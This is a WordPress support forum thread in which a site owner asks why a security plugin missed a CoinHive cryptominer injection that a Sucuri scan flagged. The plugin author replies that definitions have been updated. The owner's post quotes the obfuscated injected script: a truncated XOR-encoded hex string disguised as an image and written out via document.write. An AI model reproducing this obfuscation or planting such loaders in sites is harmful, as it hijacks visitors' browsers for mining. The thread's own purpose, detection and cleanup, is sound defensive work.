malware.cryptominer.1

  • Resolved sanch3z77

    (@sanch3z77)


    8 years, 5 months ago

    After a Sucuri scan which returned the following issue on several pages I ran your plug-in however it didn’t pick anything up. Re-running the Sucuri scan still shows the problem exists. Are you able to help or explain why?

    Malware entry: malware.cryptominer.1

    Description: Website contains a script that among other things injects a CoinHive JavaScript miner into browsers of the site visitors.

    <scr​ipt type=”text/javascript”<
    var aa9​5f71=”data:​image/jpg;base64​,d8e4bc​b1aef8abaca1b4bde5faa8b7abb1acb1b7b6e2f8b9baabb7b4adac…skipped…aee6d2==”;
    for (var i=​24; i<aa95f71.length-​2; i+=2)
    document .​write(String​.fromCharCode(​parseInt(aa95f71[​i]+””+aa95f71[i+1]​,16)​^parseInt(aa95f71[​22]+””+aa95f71[​23],​16)));</script<

    The page I need help with: [log in to see the link]

Viewing 1 replies (of 1 total)
  • Plugin Author Eli

    (@scheeeli)

    8 years, 5 months ago

    This is a new variation of an old threat. I have just added this new variant to me definition updates, so please download the latest definition update and try the scan again and it should find it 😉

Viewing 1 replies (of 1 total)

The topic ‘malware.cryptominer.1’ is closed to new replies.